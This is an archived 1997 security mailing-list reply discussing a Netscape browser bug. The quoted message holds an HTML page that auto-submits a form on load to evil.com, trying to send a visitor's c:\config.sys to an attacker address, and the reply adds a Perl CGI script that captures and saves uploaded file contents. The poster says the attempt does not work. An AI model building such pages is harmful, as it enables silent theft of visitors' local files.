Re: Netscape Exploit

Micah Brandon (brandon@VV.COM)
Sat, 14 Jun 1997 19:57:55 -0400

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Christophe Kalt: "Re: rshd gives away usernames"
Previous message: Razvan Dragomirescu: "Bug in SGI's /cgi-bin/handler"
Maybe in reply to: root: "Netscape Exploit"
Next in thread: Justin C. Ferguson: "Re: Netscape Exploit"

At 07:21 PM 6/14/97 -0500, root wrote:
>Here is a sample it isn't complete but you get the basic idea of what is
>going on
><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
>
><BODY onLoad="daForm.submit()">
><FORM
> NAME="daForm"
> ACTION="http://evil.com/cgi-bin/formmail.pl"
> METHOD=POST>
>
><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
>Harddrive">
><INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
>
>and so on and so forth...

Ah....this won't work because you're onLoad'ing daForm before you've named
the form "daForm" plus the <INPUT TYPE=FILE...> line won't take a VALUE
attribute.

I've been hackin' at this, but I can't get it either. I can "see" the
value attribute being set but I don't think it's possible to change it with
Javascript. We're probably barking up the wrong tree. Anyway, take a look
at the code below. Perhaps someone can take it from here:

Netscape Bug Test Page

And send.cgi is...

#!/usr/bin/perl

# Header
print "Context-type: text/html\n\n";
print "<H2>YOUR FILE</H2>";
print "<PRE>";

while (<STDIN>) {

$FILETEXT .= $_;
print;

}

print "</PRE>";

# Save the file to your server as well
open(SOMEFILE, "> /tmp/fromweb");
print SOMEFILE $FILETEXT;
close(SOMEFILE);

---
micah
brandon@vv.com

Next message: Christophe Kalt: "Re: rshd gives away usernames"
Previous message: Razvan Dragomirescu: "Bug in SGI's /cgi-bin/handler"
Maybe in reply to: root: "Netscape Exploit"
Next in thread: Justin C. Ferguson: "Re: Netscape Exploit"